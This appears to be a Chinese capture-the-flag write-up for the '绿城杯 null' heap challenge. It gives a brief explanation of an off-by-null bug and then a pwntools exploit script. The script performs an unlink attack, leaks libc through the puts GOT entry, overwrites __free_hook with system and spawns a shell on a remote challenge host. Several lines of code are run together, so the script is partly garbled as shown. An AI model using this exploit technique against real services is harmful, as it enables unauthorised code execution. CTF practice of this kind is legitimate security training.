绿城杯 null"/>
绿城杯 null
题目特征
增
删
改
查
思路
j8题不给libc恶心人,平时也没有用libcsearcher的习惯,这道题给了堆存储的数组,read_input这里有个洞off by null,多申请0x8然后可以覆盖pre_inuse位,那就用unlink来打,修改free_hook。
# -*- coding: utf-8 -*-
from pwn import *
elf=ELF('./1')
p=remote('82.157.5.28',51004)
libc=ELF('libc6_2.23-0ubuntu11.2_amd64.so')
context.log_level='debug'def alloc(idx,size,content):p.sendlineafter('Your choice :','1')p.sendlineafter('Index:',str(idx))p.sendlineafter('Size of Heap : ',str(size))p.sendlineafter('Content?:',str(content))def delete(index): p.sendlineafter('Your choice :','2') p.sendlineafter('Index:',str(index)) def edit(index,content): p.sendlineafter('Your choice :','3') p.sendlineafter('Index:',str(index)) p.sendafter('Content?:',content) def show(index):p.sendlineafter('Your choice :','4')p.sendlineafter('Index :',str(index)) target = 0x602120alloc(0,0x48,'aaaa')
alloc(1,0x80,'bbbb')
alloc(2,0x80,'cccc')
payload = p64(0)+p64(0x41)
payload += p64(target-0x18)+p64(target-0x10)
payload += 'a' *0x20
payload += p64(0x40)+'\x90'
edit(0,payload)
delete(1)delete(1)
edit(0,0x18*'a'+p64(0x602120)+p64(0)+p64(elf.got['puts']))
show(2)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['puts']
print hex(libc.address)
pause()
edit(0,p64(libc.sym['__free_hook']))
edit(0,p64(libc.sym['system']))
alloc(3,0x20,'/bin/sh\x00')
delete(3)
p.interactive()
更多推荐
绿城杯 null
发布评论